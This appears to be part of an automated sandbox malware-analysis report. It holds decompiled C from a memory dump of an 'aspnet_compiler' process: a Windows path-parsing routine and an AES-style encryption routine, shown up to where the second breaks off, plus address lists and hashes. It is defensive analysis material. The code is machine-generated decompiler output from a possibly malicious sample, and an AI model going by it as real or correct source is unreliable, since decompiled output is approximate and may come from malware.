                                                  C-Code - Quality: 92%
                                                  			E018A4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x197d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E018BF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = L018A6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L018A4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = L018A6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M018A45F8))) {
												case 0:
													_v568 = 0x1861078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x18611c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L018A4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															L018CF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															L018CF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E018852A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0189EB70(1, 0x19779a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0189AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E018C95D0();
																			L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return L018CB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = L018C3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return L018CB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                  0x018a4128
                                                  0x018a4135
                                                  0x018a413c
                                                  0x018a4141
                                                  0x018a4145
                                                  0x018a4147
                                                  0x018a414e
                                                  0x018a4151
                                                  0x018a4159
                                                  0x018a415c
                                                  0x018a4160
                                                  0x018a4164
                                                  0x018a4168
                                                  0x018a416c
                                                  0x018a417f
                                                  0x018a4181
                                                  0x018a446a
                                                  0x018a446a
                                                  0x018a418c
                                                  0x018a4195
                                                  0x018a4199
                                                  0x018a4432
                                                  0x018a4439
                                                  0x018a443d
                                                  0x018a4442
                                                  0x018a4447
                                                  0x00000000
                                                  0x018a419f
                                                  0x018a41a3
                                                  0x018a41b1
                                                  0x018a41b9
                                                  0x018a41bd
                                                  0x018a45db
                                                  0x018a45db
                                                  0x00000000
                                                  0x018a41c3
                                                  0x018a41c3
                                                  0x018a41ce
                                                  0x018a41d4
                                                  0x018ee138
                                                  0x018ee13e
                                                  0x018ee169
                                                  0x018ee16d
                                                  0x018ee19e
                                                  0x018ee16f
                                                  0x018ee16f
                                                  0x018ee175
                                                  0x018ee179
                                                  0x018ee18f
                                                  0x018ee193
                                                  0x00000000
                                                  0x018ee199
                                                  0x00000000
                                                  0x018ee199
                                                  0x018ee193
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018a41da
                                                  0x018a41da
                                                  0x018a41df
                                                  0x018a41e4
                                                  0x018a41ec
                                                  0x018a4203
                                                  0x018a4207
                                                  0x018ee1fd
                                                  0x018a4222
                                                  0x018a4226
                                                  0x018ee1f3
                                                  0x018ee1f3
                                                  0x018a422c
                                                  0x018a422c
                                                  0x018a4233
                                                  0x018ee1ed
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018a4239
                                                  0x018a4239
                                                  0x018a4239
                                                  0x018a4239
                                                  0x018a4233
                                                  0x018a4226
                                                  0x018a41ee
                                                  0x018a41ee
                                                  0x018a41f4
                                                  0x018a4575
                                                  0x018ee1b1
                                                  0x018ee1b1
                                                  0x00000000
                                                  0x018a457b
                                                  0x018a457b
                                                  0x018a4582
                                                  0x018ee1ab
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018a4588
                                                  0x018a4588
                                                  0x018a458c
                                                  0x018ee1c4
                                                  0x018ee1c4
                                                  0x00000000
                                                  0x018a4592
                                                  0x018a4592
                                                  0x018a4599
                                                  0x018ee1be
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018a459f
                                                  0x018a459f
                                                  0x018a45a3
                                                  0x018ee1d7
                                                  0x018ee1e4
                                                  0x00000000
                                                  0x018a45a9
                                                  0x018a45a9
                                                  0x018a45b0
                                                  0x018ee1d1
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018a45b6
                                                  0x018a45b6
                                                  0x018a45b6
                                                  0x00000000
                                                  0x018a45b6
                                                  0x018a45b0
                                                  0x018a45a3
                                                  0x018a4599
                                                  0x018a458c
                                                  0x018a4582
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018a41f4
                                                  0x018a423e
                                                  0x018a4241
                                                  0x018a45c0
                                                  0x018a45c4
                                                  0x00000000
                                                  0x018a45ca
                                                  0x018a45ca
                                                  0x00000000
                                                  0x018ee207
                                                  0x018ee20f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018a45d1
                                                  0x00000000
                                                  0x00000000
                                                  0x018a45ca
                                                  0x00000000
                                                  0x018a4247
                                                  0x018a4247
                                                  0x018a4247
                                                  0x018a4249
                                                  0x018a4249
                                                  0x018a4249
                                                  0x018a4251
                                                  0x018a4251
                                                  0x018a4257
                                                  0x018a425f
                                                  0x018a426e
                                                  0x018a4270
                                                  0x018a427a
                                                  0x018ee219
                                                  0x018ee219
                                                  0x018a4280
                                                  0x018a4282
                                                  0x018a4456
                                                  0x018a45ea
                                                  0x00000000
                                                  0x018a45f0
                                                  0x018ee223
                                                  0x00000000
                                                  0x018ee223
                                                  0x018a445c
                                                  0x018a445c
                                                  0x00000000
                                                  0x018a445c
                                                  0x00000000
                                                  0x018a4288
                                                  0x018a428c
                                                  0x018ee298
                                                  0x018a4292
                                                  0x018a4292
                                                  0x018a429e
                                                  0x018a42a3
                                                  0x018a42a7
                                                  0x018a42ac
                                                  0x018ee22d
                                                  0x018a42b2
                                                  0x018a42b2
                                                  0x018a42b9
                                                  0x018a42bc
                                                  0x018a42c2
                                                  0x018a42ca
                                                  0x018a42cd
                                                  0x018a42cd
                                                  0x018a42d4
                                                  0x018a433f
                                                  0x018a433f
                                                  0x018a42d6
                                                  0x018a42d6
                                                  0x018a42d9
                                                  0x018a42dd
                                                  0x018a42eb
                                                  0x018ee23a
                                                  0x018a42f1
                                                  0x018a4305
                                                  0x018a430d
                                                  0x018a4315
                                                  0x018a4318
                                                  0x018a431f
                                                  0x018a4322
                                                  0x018a432e
                                                  0x018a433b
                                                  0x018a433b
                                                  0x00000000
                                                  0x018a432e
                                                  0x018a42eb
                                                  0x018a434c
                                                  0x018a434e
                                                  0x018a4352
                                                  0x018a4359
                                                  0x018a435e
                                                  0x018a4361
                                                  0x018a436e
                                                  0x018a438a
                                                  0x018a438e
                                                  0x018a4396
                                                  0x018a439e
                                                  0x018a43a1
                                                  0x018a43ad
                                                  0x018a43bb
                                                  0x018a43bb
                                                  0x018a43ad
                                                  0x018a436e
                                                  0x018a43bf
                                                  0x018a43c5
                                                  0x018a4463
                                                  0x018a4463
                                                  0x018a43ce
                                                  0x018a43d5
                                                  0x018a43d9
                                                  0x018a43df
                                                  0x018a4475
                                                  0x018a4479
                                                  0x018a4491
                                                  0x018a4491
                                                  0x018a4479
                                                  0x018a43e5
                                                  0x018a43eb
                                                  0x018a43f4
                                                  0x018a43f6
                                                  0x018a43f9
                                                  0x018a43fc
                                                  0x018a43ff
                                                  0x018a44e8
                                                  0x018a44ed
                                                  0x018a44f3
                                                  0x018ee247
                                                  0x00000000
                                                  0x018a44f9
                                                  0x018a4504
                                                  0x018a4508
                                                  0x018a450f
                                                  0x018ee269
                                                  0x00000000
                                                  0x018a4515
                                                  0x018a4519
                                                  0x018a4531
                                                  0x018a4534
                                                  0x018a4537
                                                  0x018a453e
                                                  0x018a4541
                                                  0x018a454a
                                                  0x018ee255
                                                  0x018ee255
                                                  0x018ee25b
                                                  0x018ee25e
                                                  0x018ee261
                                                  0x018ee261
                                                  0x018a4555
                                                  0x018a4559
                                                  0x018a455d
                                                  0x018ee26d
                                                  0x018ee270
                                                  0x018ee274
                                                  0x018ee27a
                                                  0x018ee27d
                                                  0x018ee28e
                                                  0x018ee28e
                                                  0x018a4563
                                                  0x018a4563
                                                  0x018a4569
                                                  0x018a4569
                                                  0x00000000
                                                  0x018a455d
                                                  0x018a450f
                                                  0x00000000
                                                  0x018a44f3
                                                  0x018a43ff
                                                  0x018a4405
                                                  0x018a4405
                                                  0x018a4405
                                                  0x018a42ac
                                                  0x018a428c
                                                  0x018a4282
                                                  0x018a4407
                                                  0x018a440d
                                                  0x018ee2af
                                                  0x018ee2af
                                                  0x018a4413
                                                  0x018a4413
                                                  0x00000000
                                                  0x018a41d4
                                                  0x00000000
                                                  0x018a41c3
                                                  0x018a41bd
                                                  0x018a4415
                                                  0x018a4415
                                                  0x018a4416
                                                  0x018a4417
                                                  0x018a4429
                                                  0x018a416e
                                                  0x018a416e
                                                  0x018a4175
                                                  0x018a4498
                                                  0x018a449f
                                                  0x018ee12d
                                                  0x00000000
                                                  0x018ee133
                                                  0x00000000
                                                  0x018ee133
                                                  0x018a44a5
                                                  0x018a44a5
                                                  0x018a44aa
                                                  0x00000000
                                                  0x018a44bb
                                                  0x018a44ca
                                                  0x018a44d6
                                                  0x018a44d7
                                                  0x018a44d8
                                                  0x018a44e3
                                                  0x018a44e3
                                                  0x018a44aa
                                                  0x018a417b
                                                  0x018a417b
                                                  0x018a417b
                                                  0x00000000
                                                  0x018a417b
                                                  0x018a4175
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9367f194fab7424057ffe852d1393f16c4eb8b8fbd90eaa2ed4bccb46a76320e
                                                  • Instruction ID: f60b4ee4b3b53479e1cccf327a40cd53064e93af7177171d102a76c4bcdc43e5
                                                  • Opcode Fuzzy Hash: 9367f194fab7424057ffe852d1393f16c4eb8b8fbd90eaa2ed4bccb46a76320e
                                                  • Instruction Fuzzy Hash: 36F19F706087118FEB24CF18C484A7ABBE1FF89714F98492EF586CB251E774DA85CB52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402FB0 Relevance: .4, Instructions: 435COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 26%
                                                  			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
